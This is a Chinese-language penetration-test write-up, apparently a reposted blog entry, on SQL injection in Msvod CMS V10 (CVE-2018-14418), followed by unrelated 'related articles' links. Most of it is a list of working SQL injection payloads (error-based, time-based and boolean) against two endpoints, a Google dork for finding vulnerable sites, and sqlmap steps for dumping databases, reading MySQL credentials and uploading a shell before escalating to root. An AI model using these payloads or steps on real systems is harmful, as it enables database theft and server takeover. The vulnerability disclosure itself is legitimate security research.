CVE-2018-14418 擦出新火花
笔者《Qftm》原文发布:https://xz.aliyun.com/t/6223
0x00 前言
最近,一次授权的渗透测试项目意外的撞出了(CVE-2018-14418)新的火花,在这里分享给大家,同时简单记录一下自己的渗透测试过程,一些敏感信息已打码,相关漏洞已报送厂商修复。
0x01 Msvod Cms SQL注入漏洞原始
详解
漏洞ID | 1226187 | 漏洞类型 | SQL注入 |
---|---|---|---|
发布时间 | 2018-07-20 | 更新时间 | 2018-07-23 |
CVE编号 | CVE-2018-14418 | CNNVD-ID | CNNVD-201807-1724 |
漏洞平台 | PHP | CVSS评分 | N/A |
漏洞来源
https://www.exploit-db.com/exploits/45062
https://cxsecurity.com/issue/WLB-2018070221
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-1724
漏洞详情
Msvod Cms是一套用于视频点播网站的内容管理系统(CMS)。该系统主要提供视频点播和视频聚合建站等服务。 Msvod Cms 10版本中存在SQL注入漏洞。远程攻击者利用该漏洞执行任意的SQL命令。
漏洞EXP0.1
# Exploit Title: MSVOD V10 ¡V SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/Payload:
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
0x02 Msvod Cms SQL注入漏洞擦出新火花
资产收集
指纹探测(此处推荐云悉指纹探测http://www.yunsee.cn/finger.html)
Nmap扫描站点端口情况
手工测试分析
手工测试发现站点存在伪静态
通过测试发现存在SQL Injection同时得知该站点是一个MsvodX的CMS
通过搜索得到该CMS版本存在SQL注入漏洞
继续探索发现该漏洞原理和自己发现的本质一样
CVE-2018-14418 擦出新火花
后面直接利用/video/lists?cid=num进行注入可以达到执行任意SQL命令
此处注入得到MySQL版本和用户信息
Payload:/video/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(version()),CHAR(126)))--%20/video/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(user()),CHAR(126)))--%20
新的漏洞EXP
漏洞EXP1.1(/images/lists?cid=13)
Payload:
/images/lists?cid=13 ) ORDER BY if(1=1,1,sleep(3))--%20
漏洞EXP1.2(/images/lists?cid=13)
Payload:
/images/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(version()),CHAR(126)))--%20
漏洞EXP1.3(/images/lists?cid=13)
Payload:
/images/lists?cid=34) AND 5072=5072 AND (7051=7051
漏洞EXP2.1(在/video/lists?cid=13处发现新漏洞)
Payload:
/video/lists?cid=13 ) ORDER BY if(1=1,1,sleep(3))--%20
漏洞EXP2.2(在/video/lists?cid=13处发现新漏洞)
Payload:
/video/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(user()),CHAR(126)))--%20
漏洞EXP2.3(在/video/lists?cid=13处发现新漏洞)
Payload:
/video/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,(user()),0x7c)) desc--%20
漏洞EXP2.4(在/video/lists?cid=13处发现新漏洞)
Payload:
/video/lists?cid=34) AND 5072=5072 AND (7051=70510
Payload:
/video/lists?cid=34) AND 5072=5072 AND (7051=7051
漏洞EXP3.1(SQLMAP一键式)
探测漏洞
爆库
后面爆表爆字段不在细说(可以dump数据库)
读取MYSQL账户密码
后面可以利用绝对路径对该Linux服务器上传shell(--os-shell),之后找到服务器漏洞进行提权到root(你可以做一些你想做的事情!!!)
漏洞EXP3.2(jsql-injection一键式)
探测漏洞
ps:推荐此工具非常方便管理数据库
漏洞EXP4.1
Payload:
There are many!!!!!23333!!!
0x03 总结
SQL Injection漏洞在漏洞挖掘中还是比较常见的,对于SQL注入漏洞突破点还是在于数据的探索和处理上。关于漏洞的挖掘在于经验的积累和学习。
转载于:https://www.cnblogs.com/qftm/p/11509065.html
CVE-2018-14418 擦出新火花相关推荐
- 资本市场+金融科技,广州试点能否擦出新火花?
数据智能产业创新服务媒体 --聚焦数智 · 改变商业 3月20日,广东证监局.广州市地方金融监管局发布<关于开展广州资本市场金融科技创新试点工作的通知>(简称<通知>),即日起 ...
- 「古老」茶产业碰上「年轻」区块链,能否擦出新火花?
区块链重构茶产业,古老茶产业换发生机. 如何拯救茶产业? 茶叶,作为与咖啡和可可并称的世界三大无酒精饮料,已经走过了6000余年的历史.作为中华文化的代表和缩影,种类繁多的茶叶不仅在国内拥有众多&qu ...
- 一起探讨NLP的边界和未来,学术界与工业界在“语言与智能高峰论坛”上擦出火花...
允中 发自 凹非寺 量子位 报道 | 公众号 QbitAI 语言与智能技术发展到了什么程度?未来的技术发展趋势是什么?如何与其他人工智能技术协同发展?都是值得思考与探讨的问题. 作为"最具 ...
- 饶天亮到访深圳时空梭,区块链技术与名人明星产业碰撞出新火花
2018年2月26日,时空梭签约名人饶天亮到访深圳时空梭科技有限公司,洽谈合作事宜. 时空梭构建了一个完整名人明星产业的生态系统,该生态是以区块链技术为底层智能合约,以自主开发的娱乐链Enterta ...
- 管理员需要对此项目进行安全扫描_当ArcGIS Server与Web安全擦出火花??
在WebGIS的项目开发过程中,前端项目的安全隐患也经常出现在GIS系统中,如常见的WEB安全问题,如XSS.XSRF.SQL注入等时刻都影响GIS系统安全,要保证GIS系统的安全,从某种程度上就必须 ...
- VR和云服务,使出洪荒之力也难擦出火花
近日,HTC攀上了阿里巴巴的大腿,欲探索云服务在VR上的应用.类似这样的VR和云服务邂逅,能在短时间内开花结果吗? 近日,HTC和阿里云喜结良缘并昭告天下.阿里云要用云服务推动HTC的VR生态布局发展 ...
- 区块链开发公司之区块链技术融合云计算能否碰撞出新火花
区块链的众多优势使其可以很好地解决现有一些技术所面临的瓶颈问题,利用这些优势和传统云计算技术相结合,将促进基于区块链的分布式云计算领域的一些突破和应用,为大规模的应用打下基础,区块链作为新兴的技术引起 ...
- AI与元宇宙擦出火花:人类失去的只有枷锁,获得的是全方面的解放
- 中关村壹号官兰兰:连接AI企业和传统企业,打造硬科技服务联盟 | MEET2020
鱼羊 整理自 MEET2020 量子位 报道 | 公众号 QbitAI 在AI领域,有奋勇向前的创造者,也有站在第三方视角的行业观察者.宣传队.播种机. AI创业,技术与眼光并重,却也少不了外界的服务 ...
最新文章
- cesium 渲染分析(以太阳为例),实现卫星任务规划中地球赤道平面绘制
- Java加载词向量_W2C得到词向量之后,如何得到句子向量,
- U盘制做DOS启动盘
- Python开发Day03
- softmax函数为什么叫softmax?
- CG CTF WEB 伪装者
- redis 本机链接服务端命令
- HDU - 1723 - Distribute Message
- 因果推断与反事实预测——几篇关联论文(二十六)
- matplotlib 柱状图、饼图;直方图、盒图
- 计算机网络配置vlan实验报告,北京理工大学-计算机网络实践-VLAN配置及VLAN间通信实验报告...
- 实时数据流采集工具Flume
- DM6437的学习过程
- NLP--解决Mac OS 10.14.4Python下pip install pyhanlp 失败
- 【跨域】springBoot + VUE解决跨域问题几种处理方案
- 关于小码哥kylin
- Tomat介绍--1
- 本周大新闻|CES 2023 AR/VR最全汇总
- 打印的资料怎么装订成册?
- 微信公众号之清理缓存无效
热门文章
- oracle中慢sql优化思路
- 基于java的qq屏幕截图工具的设计与实现_几款鲜为人知的实用工具,你都尝试过吗?...
- JSON.toJSONString 首字母不小写
- com/fasterxml/jackson/core/exc/InputCoercionException
- c++分割字符串方法
- RedHat6.4安装IBM MQ7.5
- Android开发笔记(一百二十)两种侧滑布局
- Android Studio 快捷键、Debug的使用
- YAML文件结构简介
- 人造电子皮肤、软体机器人、单孔腔镜手术机器人......青年科学家们都在研究哪些“黑科技”?...